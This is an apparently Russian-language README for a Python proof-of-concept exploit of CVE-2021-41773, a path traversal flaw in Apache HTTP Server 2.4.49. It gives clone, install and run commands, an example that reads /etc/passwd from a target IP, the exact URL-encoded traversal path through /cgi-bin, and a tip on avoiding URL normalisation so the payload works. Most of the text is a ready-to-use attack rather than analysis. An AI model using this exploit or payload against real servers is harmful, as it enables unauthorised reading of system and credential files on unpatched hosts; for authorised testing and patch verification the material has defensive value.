
Эксплойт на Python для CVE-2021-41773 - уязвимость Path Traversal в Apache HTTP Server 2.4.49
Эксплойт на Python для CVE-2021-41773, уязвимости обхода пути в Apache HTTP Server 2.4.49, позволяющей читать произвольные файлы с сервера.
CVE-2021-41773 — это уязвимость обхода пути в Apache HTTP Server 2.4.49, возникающая из-за неправильной проверки путей, предоставленных пользователем. Уязвимость позволяет злоумышленникам читать файлы за пределами корневой директории документов, используя последовательности обхода пути, закодированные в URL.
git clone https://github.com/blu3ming/PoC-CVE-2021-41773
cd PoC-CVE-2021-41773
pip install -r requirements.txt
python3 cve-2021-41773.py -t <target> -f <file_path>
-t, --target: Целевой URL (включите протокол и порт при необходимости)-f, --file: Путь к файлу для чтения с сервера# Read /etc/passwd
python3 cve-2021-41773.py -t http://192.168.1.100:443 -f /etc/passwd

Эксплойт использует последовательности обхода пути, закодированные в URL (.%2e/%2e%2e/), для обхода проверки пути Apache:
.%2e) обходят первоначальные проверки безопасности.Ключевой момент — использование urllib3.PoolManager() вместо requests.get() для предотвращения автоматической нормализации URL, которая могла бы нарушить работу эксплойта.
# The exploit URL structure:
/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/{target_file}
Это преобразуется в:
/cgi-bin/../../../../{target_file}